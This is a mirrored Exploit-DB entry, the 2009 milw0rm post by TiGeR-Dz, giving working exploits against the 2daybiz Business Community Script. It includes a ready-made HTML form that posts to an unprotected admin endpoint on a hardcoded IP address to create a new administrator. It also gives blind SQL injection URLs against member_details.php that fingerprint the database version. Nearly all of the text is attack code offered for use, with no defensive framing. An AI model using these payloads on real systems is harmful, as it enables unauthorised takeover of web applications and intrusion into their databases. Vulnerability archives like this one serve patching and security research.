- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8689
- Проверка EDB
-
- Пройдено
- Автор
- TIGER-DZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1652 cve-2009-1651
- Дата публикации
- 2009-05-14
Код:
-------------------------------------------------------------------------------------------------------------
2daybiz Business Community Script (adminaddeditdetails.php) Add Admin / Remote Blind SQL Injection Exploit
----------------------------------------------------------------------------------------------------
Founder: TiGeR-Dz
Script:Business Community Script
Home:http://www.2daybiz.com/
Download:http://www.2daybiz.com/business_comm_download.html
--------------------------------------------------------------------------------------------------
1/Add Admin Exploit:
----------------------------------------------------------------
<p align="center">
<body bgcolor="#000000">
</p>
<p> </p>
<p><font size="5" color="#FF0000">CoD3d By </font>
<font color="#FFFFFF" size="5">:TiGeR.dZ</font></p>
<form id="form1" name="editinguser" method="post" action="http://98.131.92.231/products/businesscommunity/admin/adminaddeditdetails.php?adduser" onsubmit="return editvalidateform();">
<table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="blue_border">
<tr>
<td colspan="3"><div align="center" class="gblue_bg">
<font size="5" color="#FF0000">Add
User </font> </div></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr>
<td width="19%"> </td>
<td width="28%" align="left" class="yoda">
<font color="#FF0000" size="4">Username</font></td>
<td width="50%" align="left"><label>
<input name="username" type="text" id="username" size="25" />
</label> </td>
</tr>
<tr>
<td class="yoda" width="19%"> </td>
<td align="left" class="yoda">
<font color="#FF0000" size="4">Password</font></td>
<td align="left"><label>
<input name="password" type="password" id="password" size="25" />
</label></td>
</tr>
<tr>
<td class="yoda" width="19%"> </td>
<td align="left" class="yoda">
<font color="#FF0000" size="4">Name </font> </td>
<td align="left"><label>
<input name="name" type="text" id="name" size="25" />
</label></td>
</tr>
<tr>
<td class="yoda" width="19%"> </td>
<td align="left" class="yoda">
<font color="#FF0000" size="4">Email</font></td>
<td align="left"><label>
<input name="email" type="text" size="25" />
</label></td>
</tr>
<tr>
<td colspan="2" class="yoda"> </td>
<td> </td>
</tr>
<tr>
<td colspan="3" class="yoda"><label>
<div align="center">
<input type="submit" name="Submit" value="Add User" />
</div>
</label></td>
</tr>
</html>
---------------------------------------------------------------------------------------------------------------------------------------------------
2/ Remote Blind SQL Injection Exploit:
-------------------------------------------
Note: this gaps is Exist within the file of the control panel (adminaddeditdetails.php) :)
1/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=4 False
2/http://98.131.92.231/products/businesscommunity/admin/member_details.php?mid=1+and+substring(@@version,1,1)=5 True
------------------------------------------------------------------------------------------------------------------------------------------
www.h4ckf0ru.com #
-----------------------------------------------------------------------------------------------------------------------------------
# milw0rm.com [2009-05-14]
- Источник
- www.exploit-db.com